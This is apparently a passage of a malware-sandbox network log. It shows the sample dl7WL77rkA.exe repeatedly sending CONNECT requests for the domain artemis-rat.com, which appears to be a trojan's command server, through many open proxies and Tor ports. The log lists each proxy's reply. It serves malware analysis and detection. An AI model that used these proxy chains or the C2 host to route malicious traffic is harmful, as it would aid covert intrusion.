User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.421799898 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
668192.168.2.551880192.252.216.8141453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.267380953 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
669192.168.2.551995104.17.132.79803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.268058062 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.422770977 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
670 | 192.168.2.5 | 51851 | 178.154.228.16 | 9050 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.271229029 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:04.119040012 CET | 729 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
671 | 192.168.2.5 | 51955 | 38.162.29.127 | 3128 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.272944927 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.683459044 CET | 111 | IN | HTTP/1.1 407 Proxy Authentication Required
Proxy-Authenticate: Basic realm=""
Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
Data Ascii: Proxy Authentication Required


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
672 | 192.168.2.5 | 51853 | 148.72.215.79 | 48623 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.274127007 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.998727083 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.092879057 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
673 | 192.168.2.5 | 51295 | 107.180.88.41 | 57642 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.274699926 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
674192.168.2.5511065.59.141.9410803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.281891108 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
675192.168.2.5518735.196.111.30200603876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.287594080 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
676192.168.2.55187147.243.205.131283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.288335085 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.599297047 CET | 59 | IN | HTTP/1.1 200 Connection Established
Proxy-agent: nginx


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
677 | 192.168.2.5 | 50532 | 111.53.178.249 | 7302 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.292443037 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.355211020 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.330271006 CET | 71 | IN | HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 55
Mar 11, 2024 03:30:49.154608011 CET | 126 | IN | HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 55
Data Raw: 7b 22 63 6f 64 65 22 3a 22 30 78 30 31 39 30 30 30 31 33 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 67 65 74 20 68 74 74 70 20 68 65 61 64 65 72 20 66 61 69 6c 22 7d 0a
Data Ascii: {"code":"0x01900013","message":"get http header fail"}
Mar 11, 2024 03:30:54.945466042 CET | 126 | IN | HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 55
Data Raw: 7b 22 63 6f 64 65 22 3a 22 30 78 30 31 39 30 30 30 31 33 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 67 65 74 20 68 74 74 70 20 68 65 61 64 65 72 20 66 61 69 6c 22 7d 0a
Data Ascii: {"code":"0x01900013","message":"get http header fail"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
678 | 192.168.2.5 | 51300 | 162.214.225.223 | 58240 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.296562910 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            679192.168.2.552032104.20.51.99803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.299871922 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.454998016 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            680192.168.2.551101186.194.119.20555663876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.309151888 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.436706066 CET | 19 | IN | HTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            681192.168.2.551879185.38.111.180803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.311659098 CET | 193 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Mar 11, 2024 03:30:40.633116961 CET | 75 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Length: 0
Mar 11, 2024 03:30:40.997690916 CET | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
                                                                                                                                                                                                                                                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                            Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            682192.168.2.552059104.21.66.184803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.314523935 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.468858004 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            683192.168.2.551869194.53.158.57532813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.314547062 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.695595980 CET | 202 | IN | HTTP/1.0 404 Not Found
Content-Length: 715
Content-Type: text/html
Date: Fri, 02 Jan 1970 04:07:31 GMT
Expires: Fri, 02 Jan 1970 04:07:31 GMT
Server: Mikrotik HttpProxy
Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            684192.168.2.551205164.92.237.188555883876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.317188025 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.389456034 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.405970097 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.499047995 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            685192.168.2.55119351.83.184.24191913876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.317270994 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.401101112 CET | 536 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            686192.168.2.551178101.255.150.4980893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.320429087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.656258106 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            687192.168.2.552069104.16.195.74803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.320760965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.475323915 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            688192.168.2.552007162.241.50.179359483876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.326009035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.826688051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.514724016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.806447029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.238996983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.681890011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            689192.168.2.55199238.162.31.23831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.329806089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.746795893 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            690192.168.2.551872176.123.56.5836293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.330252886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            691192.168.2.552081104.25.42.178803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.330631971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.485146999 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            692192.168.2.552054107.181.168.14541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.331098080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
693 | 192.168.2.5 | 51361 | 66.228.35.209 | 17464 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.331360102 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.389456987 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.405996084 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.499049902 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
694 | 192.168.2.5 | 52062 | 47.251.34.170 | 1080 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.332837105 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.795439959 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.405364037 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.498956919 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
695 | 192.168.2.5 | 51902 | 125.122.26.242 | 1080 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
